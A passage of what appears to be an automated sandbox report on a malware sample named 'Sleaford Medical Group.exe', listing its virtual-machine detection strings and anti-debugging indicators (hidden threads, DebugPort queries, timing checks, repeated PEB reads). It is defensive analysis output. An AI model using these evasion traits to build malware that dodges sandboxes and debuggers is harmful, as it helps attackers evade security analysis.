      Source: Sleaford Medical Group.exe, 00000016.00000002.567348461.0000000000899000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000018.00000000.512900592.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
      Source: explorer.exe, 00000018.00000000.524058813.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
      Source: explorer.exe, 00000018.00000000.524058813.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
      Source: explorer.exe, 00000018.00000000.524127788.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
      Source: explorer.exe, 00000018.00000000.512927052.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
      Source: explorer.exe, 00000018.00000000.523652219.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: Sleaford Medical Group.exe, oversad.exe, 0000001A.00000002.730357636.0000000000420000.00000040.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: Sleaford Medical Group.exe, 00000016.00000002.566373992.0000000000870000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW`g
      Source: explorer.exe, 00000018.00000000.523652219.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 00000018.00000000.524783667.00000000089C9000.00000004.00000001.sdmpBinary or memory string: qeMusic
      Source: explorer.exe, 00000018.00000000.523652219.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeProcess information queried: ProcessInformation

      Anti Debugging:

      Hides threads from debuggers
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 0_2_00401C31 rdtsc
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D967A LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39E620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C8E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3BAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3BAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3BAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3BAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3BAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E44FE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E44FEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E468ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E42FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A76E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C16E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E460EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E460EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E460EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4146A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C36CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D8EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CE730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E394F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E394F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E468F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3BF716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E46070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E46070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E42FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E42FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3AFF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3AEF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A8794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D37F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E417794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E417794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E417794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CBC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E42C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E42C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E46740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E46740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E46740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3B746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CA44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E468CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4514FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E413540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E443D40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39AD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3BC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3BC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3B7D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E468D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E41A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45E539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D3D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C35A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E392D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E392D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E392D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E392D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E392D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E448DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3AD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3AD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4605AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4605AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45EA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D4A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D4A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E424257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E44B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E44B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E468A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3B3A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E395210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E395210 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E395210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E395210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A8A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E399240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E399240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E399240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E399240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3AAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3AAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CFAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3952A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3952A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3952A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3952A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3952A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CD294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CD294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C2AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C2ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E468B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39DB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39F358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39DB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4153CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4153CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C2397 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CB390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E44D380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3BDBE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E465BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3AB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3AB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3AB02A mov eax, dword ptr fs:[00000030h]
